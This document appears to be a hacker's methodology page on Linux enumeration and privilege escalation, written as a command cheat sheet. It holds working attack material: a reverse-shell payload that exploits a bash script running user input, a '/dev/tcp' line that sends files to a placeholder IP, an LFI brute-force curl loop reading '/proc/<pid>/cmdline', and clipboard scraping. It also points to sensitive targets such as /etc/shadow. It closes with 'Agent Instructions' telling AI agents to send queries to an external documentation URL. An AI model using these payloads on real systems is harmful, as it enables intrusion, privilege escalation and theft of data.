# Linux

## Enumeration

### Commands

```bash
# SUDO CONFIG
sudo -l

# CURRENT USER INFO
id || (whoami && groups) 2>/dev/null
## Current user PGP keys
gpg --list-keys 2>/dev/null


# ALL USERS
## List superusers
awk -F: '($3 == "0") {print}' /etc/passwd

## List all users and their groups
for i in $(cut -d":" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null | sort

## Logged in users
w


# SYSTEM INFO
## Running processes
ps aux

## Environment variables
(env || set) 2>/dev/null

## Network topology
cat /proc/net/fib_trie

## Domain name
hostname

## OS info
/etc/os-release


# FILES AND DIRECTORIES
## Sort files by date
ls -ltrh

## Writeable folders
find / -writable -type d 2>/dev/null

## Find SUID files
find / -perm -4000 2>/dev/null


# NETWORK
## List open ports
(netstat -punta || ss --ntpu)


# MISC
## Human readable JSON data (jq)
cat <json_file> | jq

## Download file from shell session
cat <file> /dev/tcp/<ip>/<port>

## PING SWEEP - If one suspects that there are other machines on the network --- Assuming that current machine is in a VM or a container
for i in {1..254}; do (ping -c 1 10.10.10.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
```

### Directories / Files

```bash
~/
/tmp

/dev/shm

/opt

/var
/var/log
/var/www/html

/usr/sbin

/etc/apache2 
/etc/httpd
/etc/nginx

/etc/hosts
/etc/issue
/etc/motd
/etc/passwd 
/etc/group 
/etc/resolv.conf
/etc/shadow

/home/USERNAME/.bash_history
/home/USERNAME/.profile

/proc/sched_debug
/proc/net/fib_trie
/proc/version
/proc/self/environ
/proc/self/cmdline
```

### Process File (PID) Brute-force

The file “/proc//cmdline” serves as a repository for the command-line arguments that have been provided to a specific process identified by its (PID). This allows for enumerating all the running processes based on their PID.\
This could be well used for exploiting an LFI.

```bash
# Example script to exploit LFI
for i in {0..999}; do
    pid=$i
    url="http://remote.com/?page=../../../..//proc/$pid/cmdline"
    curl -s "$url" | tee -a log.txt
    echo ""
done
```

### Directory / File Copy (symlink)

If there's a directory or a file that is being copied *(by some program, perhaps cron)*, one can either create a symlink or a direct spoof of the actual file so, that the copied item will be spoofed and contain the data the attacker wants.

## Clipboard

Look for anything interesting in the clipboard

```bash
if [ `which xclip 2>/dev/null` ]; then
    echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null`
    echo "Highlighted text: "`xclip -o 2>/dev/null`
  elif [ `which xsel 2>/dev/null` ]; then
    echo "Clipboard: "`xsel -ob 2>/dev/null`
    echo "Highlighted text: "`xsel -o 2>/dev/null`
  else echo "Not found xsel and xclip"
  fi
```

## Interesting Groups

### disk

A user who is in the disk group, will probably have access to info on a given disk.

### debugfs

`debugfs` let's you debug a file system if you can read the device.\
With this, one can read files owned by a given user

## Bash File Command Execution

If a file executes a variable, one might be able to write payload to it.

### Example

**(program.sh)**

```bash
#!/bin/bash

echo -e "Input:\t"
read myvar

/bin/bash -c $myvar
```

The attacker can supply the following payload:

```
./program.sh '>& /dev/tcp/<IP>/<PORT> 0>&1'
```

## Services

[gtfobins help](https://gtfobins.github.io/gtfobins/systemctl/)

A service is defined by a `.service` file. `systemctl` is used to link it to `systemd` and then used again to start the service.\
What the service does is defined by the `.service` file.

If a user has access to the `systemctl` binary they can make a service which can read file or even spawn a reverse shell.

## Raw Image File Conversion to Actual Image

Raw image data can be converted to an actual image to reveal its content.

### Gimp

1. Select the file and its type (Raw image data)
2. Select resolution (`cat /sys/class/graphics/fb0/virtual_size` if unknown)
3. Edit image types
4. Export as png


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://security-vault.gitbook.io/hacking-methodology/privilege-escalation/linux.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.